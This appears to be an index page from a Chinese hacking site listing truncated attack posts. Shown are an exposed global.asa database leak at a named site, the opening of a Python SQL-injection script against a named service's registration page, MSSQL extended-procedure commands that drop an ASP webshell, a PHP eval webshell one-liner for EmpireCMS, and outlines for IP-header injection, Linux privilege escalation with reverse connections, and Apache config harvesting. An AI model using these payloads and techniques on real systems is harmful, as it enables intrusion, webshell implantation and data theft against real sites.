中关村在线数据库泄漏!

漏洞不知道是谁现发现的。。。 爆数据库文件:http://www.zol.com.cn/global.asa <SCRIPT LANGUAGE=VBScript RUNAT=Server> 'You can add special event handlers in this file that will get run automatically when 'special Acti...

- 阅读全文 -

窝窝团SQL注入漏洞

注册页面 校验email和用户名的地方使用了Ajax POST 数据到服务器端检测,但是过滤仅在客户端进行。使用脚本或者浏览器工具可以轻松绕过。 以下为测试代码(python): import httplib, urllib import sys   if len(sys.argv) < 2: exit(0)   headers = { “Accept”: “*/*”, ...

- 阅读全文 -

3个MSSQL扩展,可用来获取WEBSHELL

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp' 打包 EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp' 解包,可以用于得到webshell EXEC [master].[dbo].[xp_readerrorlog] 1,'d...

- 阅读全文 -

EmpireCMS(帝国)后台拿shell

管理模板 添加自定义页面 <\?php eval($_POST[baidu])?\> <%这个被过滤了所以必须这样写。 作者:killer 还是几个月前一个朋友让我看看帝国进后台能不能找到简单点拿shell的方法,因为他找的方法虽然达到目的了,但是过程很繁琐. 方法很简单,直接上传webshell.. 进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直...

- 阅读全文 -

阿d asp目录扫描脚本

昨天扫描星外发现没有啊D目录脚本。。。现在上传上来! 结合https://www.webshell.cc/1287.html 就OK了! 上图: 下载地址:阿d-asp目录扫描脚本

- 阅读全文 -

不常用的注入–利用IP地址进行注入

 以前曾经QQ空间发布过关于IP注入攻击的文章,这种注入其实没什么神秘,只是很多时候被忽略了。 IP伪造有几种途径,一种是通过是修改IP数据包,有兴趣的可以去看看IP数据包的结构,还有一种就是利用修改http头信息来实现IP伪造。涉及到“客户端”IP的通常使用3个环境变量:$_SERVER['HTTP_CLIENT_IP']和$_SERVER['X_FORWARDED_FOR']还有$_SERVE...

- 阅读全文 -

'插入式' 注入技巧

很不错的注入手法,今天发到这跟大家共享下。 不喜勿喷! 例: https://www.webshell.cc/gaokao/ReadNews.asp?NewsID=3255'&BigClassName=&BigClassID=21&SmallClassID=42&SpecialID=0 试着在Newsid=3255后面插入“'”,结果报错。 “Microsoft OL...

- 阅读全文 -

linux渗透与安全第三节 - 提权

一些人一直觉得Linux提权是一项高深技术,其实Linux提权并不神秘。总结其步骤,可以简单分为5步: 1,获取webshell 2,具有执行command line权限,并获取Linux的系统版本 3,上传与Linux系统版本对应的漏洞提权脚本至可写可执行的目录下 4,执行提权脚本和反弹连接脚本 5,远程使用command line控制机器 本文所采用的实例仍然是广岛大学研究所的服务器,但是目前...

- 阅读全文 -

linux渗透与安全第二节 - 读取配置文件

国际上最通用的Linux虚拟主机搭建方式是这样的: Linux操作系统+Apache网站容器+PHP脚+MySQL数据库 一个服务器上的网站配置信息显然都储存在Apache的配置文件中。通常Apache会安装在Linux的这个目录下:/usr/local,其Apache的conf配置文件也会在Apache的目录下,当然,也有的Apache配置文件会单独拿出来,放到例如/etc/httpd/conf...

- 阅读全文 -